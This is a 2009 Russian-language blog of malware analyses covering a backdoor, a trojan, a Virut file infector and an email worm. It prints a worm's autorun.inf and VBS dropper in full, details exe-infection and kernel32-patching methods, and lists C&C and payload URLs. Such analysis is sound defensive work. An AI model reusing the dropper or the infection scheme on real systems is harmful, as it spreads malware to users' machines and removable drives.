пятница, 27 февраля 2009 г.

Backdoor.Win32.Agent.adse

Имя файла: bot.dll
Размер: 59 Кб
http://www.virustotal.com/ru/analisis/5b2d2c83020f9257315c2e8d4e5ce2d5
Более новая версия библиотеки Px.ax из предыдущего поста (Trojan.Win32.Agent.bryp). Вначале идет фейк код из мусорного кода с ложными вызовами API функций. Непосредственно сам рабочий код был значительно увеличен, добавлена поддержка работы в режиме прокси серверов (HTTP и Socks). Бот теперь называется “HTTP/SOCKS Bot v1.8”. Прокси сервера выполнены в виде отдельных потоков. Бот ведет подробный лог своей работы в файле “C:\automate.bin”. Кроме основного C&C сервера –“trafficmonsterinc.ru”, был добавлен еще и дополнительный “controller.505.ru”. Существует еще upload сервер “http://uploasssssd.com”. На сервер отправляется информация о компьютере жертвы, доступных портах, времени пинга, а так же с помощью запросов на сайт www.ip2location.com информация о внешнем IP адресе и стране к которой он относится. Управляется бот с помощью конфига, который скачивает с C&C. Дополнительно скачивает следующие файлы: http://trafficmonsterinc.ru/gg.dll сохраняется под именем “C:\windows\gif32.dll” и загружается, http://trafficmonsterinc.ru/ggg.dll сохраняется под именем “ C:\windows\zavsmob.dll” и устанавливается как BHO.

Имя файла: gg.dll
Размер: 12 Кб
Time/Date Stamp (GMT): 5 февраля 2009 г. 20:31:33
http://www.virustotal.com/ru/analisis/8ff89c052411c8ff1c4c8b48ec24f6c0
Файл упакован UPX. После распаковки ~53 Кб. Скачивает следующие файлы: http://trafficmonsterinc.ru/bot2.exe (разобран в предыдущем посте под именем “12177.exe”) сохраняет под именем “_img358.gif”, http://trafficmonsterinc.ru/folder.ico сохраняет под именем “_img359.gif”. Далее запускается поток, в котором ищутся съемные диски (флешки) и записывается туда файл “autorun.inf” со следующим содержанием:
[autorun]
action=Open folder to view files
icon=folder.ico
shellexecute=system.vbs
LABEL=My Drive

Далее записывается файл “system.vbs”:
On Error Resume Next
Const Hidden = 2
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run ".\"
Set fso = CreateObject("Scripting.FileSystemObject")
fso.CopyFile "system2.exe", "c:\system.exe",TRUE
Set objFile = fso.GetFile("c:\system.exe")
If objFile.Attributes Then
objFile.Attributes = Hidden
End If
WshShell.Run "c:\system.exe"

Сохраняется файл “folder.ico” со скаченной ранее иконкой и непосредственно сам “system2.exe” (скаченный ранее “bot2.exe”). Затем запускается процедура заражения *.exe файлов: сначала ищутся все папки в корне диска, затем процедура повторяется рекурсивно для каждой найденной папки, далее ищутся exe файлы и происходит их заражение. При заражении пропускаются файлы “system2.exe”, “system.exe” и файлы, у которых есть метка зараженности (дворд по смещению -0x90 байт от конца файла равен 0xD97AB8). Из тела программы извлекается файл размером 5,5 Кб и сохраняется под именем заражаемого файла с символом “_” на конце. Этому файлу устанавливается в ресурсы иконка заражаемого файла и ставится атрибут “HIDDEN”. Затем в конец инфицируемого файла дописывается “bot2.exe” каждый байт, которого поксорен константой 0xAA, а затем получившийся файл дописывается в конец файла с символом подчеркивания на конце. Затем файл с подчеркиванием на конце имени и файл заражаемой программы удаляются. В результате получается четырехслойный “бутерброд”: первый слой (5,5 Кб) это программа, извлекающая и расшифровывающая остальные два слоя, сохраняет слои в папку TEMP и запускающая их на выполнение; второй слой это скаченный “bot2.exe” поксоренный константой 0xAA; третий слой это непосредственно сама зараженная программа поксоренная константой 0xAA; четвертый слой это служебная информация размером 0x90 байт (идентификационная константа, размеры каждого слоя и т.д.). Если скачать “bot2.exe” у программы не вышло, то второй слой просто имеет нулевой размер.
Кроме того, заражаются и некоторые программы, если такие есть на компьютере:
eMule
DC++
ApexDC++
Cerberus FTP Server
FileZilla Server
Golden FTP Server
Xlight FTP
и заодно заражает все расшаренные папки и “Documents And Settings” других учетных записей.
Имя файла: ggg.dll
Размер: 22 Кб
Time/Date Stamp (GMT): 4 февраля 2009 г. 21:55:37
http://www.virustotal.com/ru/analisis/ad365f4ff8915057b6c5bc7f8b86c3a3
Файл разбавлен мусором. Вначале расшифровывается основное тело программы (ADVAPI32.CryptDecrypt). Затем еще один слой расшифровки и создание нового потока. В новом потоке устанавливается перехват следующих функций: 'InternetConnectW', 'HttpOpenRequestW', 'InternetConnectA', 'HttpOpenRequestA', 'HttpSendRequestW', 'HttpSendRequestA', 'InternetQueryDataAvailable', 'InternetReadFile', 'InternetCloseHandle', 'ExitProcess', 'FreeLibrary' с последующей фильтрации трафика. Перехват делается только в пределах своего процесса, т.к. библиотека установлена как BHO.
Кроме того, программа скачивает и запускает файл http://trafficmonsterinc.ru/grabber.exe . Скачиваемая программа (704 Кб) оказалась программой сбора паролей от огромного количества программ – SpotAuditor v3.7.7 (http://spotauditor.nsauditor.com)

2009, GMax
e_gmax@mail.ru

вторник, 24 февраля 2009 г.

Trojan.Win32.Agent.bryp

Имя файла: 111.exe
Размер: 22,1 Кб
Time/Date Stamp (GMT): 5 февраля 2009 г. 14:54:12
http://www.virustotal.com/ru/analisis/1f7b296f89914c531ffcb6c9e10df59b
Файл не чем не запакован, написан на Visual C++ 6.0. Зачем-то читает в ветке реестра "Software\Microsoft\Windows\CurrentVersion\ShellBotR" ключ “Infected”. Далее извлекает и расшифровывает из себя два других исполняемых файла: имя первого генерируется случайно (12177.exe), имя второго “пустышка.exe”, сохраняет их в папку Temp и запускает на исполнение. Как и следует из имени, второй файла ничего не делает кроме вызова функции ExitProcess (размер файла 1,5 Кб).
Имя файла: 12177.exe
Размер: 15 Кб
Time/Date Stamp (GMT): 3 февраля 2009 г. 12:39:13
http://www.virustotal.com/ru/analisis/9602874fe625c156ae5b21ac5fa95472
Файл разбавлен мусором. Вначале расшифровывается основное тело программы (ADVAPI32.CryptDecrypt).
Далее инициализируется импорт, расшифровывается нужные строки. Расшифровывается и сохраняется в папку System32 библиотека “Px.ax”. Затем троян читает kernel32.dll, производит модификацию функции CreateProcessW, добавляя загрузку библиотеки “Px.ax”. Оригинальная библиотека "\system32\dllcache\kernel32.dll" переименовывается в "kbdpx.dll", а на ее место записывается модифицированный вариант. При записи новых файлов время создания и модификации устанавливается такое же как и у файла “kernel32.dll”.
В цикле 380 раз проходит по списку запущенных процессов, ищет процесс "taskmgr.exe" (Диспетчер процессов), в случаи, если процесс запущен, останавливает все его потоки. Далее еще один цикл с поиском процессов "explorer.exe" и "taskmgr.exe" и остановкой их потоков. Результатом остановки потоков процесса "explorer.exe" будет “зависание” системы, а далее, скорее всего перезагрузка системы.
Имя файла: Px.ax
Размер: 12,5 Кб
Time/Date Stamp (GMT): 3 февраля 2009 г. 12:37:21
http://www.virustotal.com/ru/analisis/fe89654a85028db84064ae58d49c31f2
Не чем не упакованная DLL. Инжектится к процессу "svchost.exe" с помощью функции CreateRemoteThread. При работе создает мютекс "Global\\Px.Ax". Скачивает файл: http://trafficmonsterinc.ru/bot.dll. Большая часть кода DLL не работает. Есть зашифрованные строки для отключения встроенного фаервола, установки в автозагрузку, URL и т.д., но все это не используется.
2009, GMax
e_gmax@mail.ru

пятница, 6 февраля 2009 г.

Virus.Win32.Virut.ce

Имя файла: tcflash.exe
Размер: 30,5 Кб
Time/Date Stamp (GMT): 24 сентября 2007 г. 13:42:46
http://www.virustotal.com/ru/analisis/77f189044d56330a199c4b20eb25f161
Файл заражен путем расширения последний секции. Переход на добавленный код осуществляется не сразу на точке входа, а спустя некоторое число команд. Код разбавлен мусором и зашифрован. После расшифровки программа ищет базу kernall32.dll затем, по заданным хешам, ищутся нужные API функции. После этого перебираются процессы в системе, пропуская четыре первых и попадая на процесс winlogon.exe, далее производится инжект с помощью CreateRemoteThread. А вот сам код попадает в процесс winlogon.exe с помощью мэпирования секции (ZwMapViewOfSection). Далее программа копирует в процесс адреса нужных API функций.
В инжектированном коде открывается файл “Windows\System32\Drivers\ETS\HOST” и записывается туда строка “127.0.0.1 ZieF.pl”. Прописывает процесс winlogon.exe в исключения внутреннего брандмауэра. Командный центр находится по адресу http://ZieF.pl/, по адресу http://ZieF.pl/rc/ можно скачать PDF эксплоит.
Управление осуществляется по IRC.
2009, GMax
e_gmax@mail.ru

воскресенье, 1 февраля 2009 г.

Email-Worm.Win32.Agent.gfs

Имя файла: BD.exe
Размер: 63,5 Кб
Time/Date Stamp (GMT): 22 января 2009 г. 7:45:15
http://www.virustotal.com/ru/analisis/ce2cd829662982f3271a8c43f86cc2b8
Файл не чем не запакован, нет никаких препятствующих техник. После стандартной процедуры инициализации импорта, троян создает для работы несколько мютексов с помощью которых осуществляется управление потоками трояна. Далее запускает четыре потока, которые занимаются пересылкой шифрованной информации и рассылкой на указанные адреса спама. Адрес командного центра 94.75.209.4 (hosted-by.leaseweb.com).
В коде присутствуют строки,
поискав в Интернете можно найти довольно подробные описания трояна Trojan.Kobcka.
2009, GMax
e_gmax@mail.ru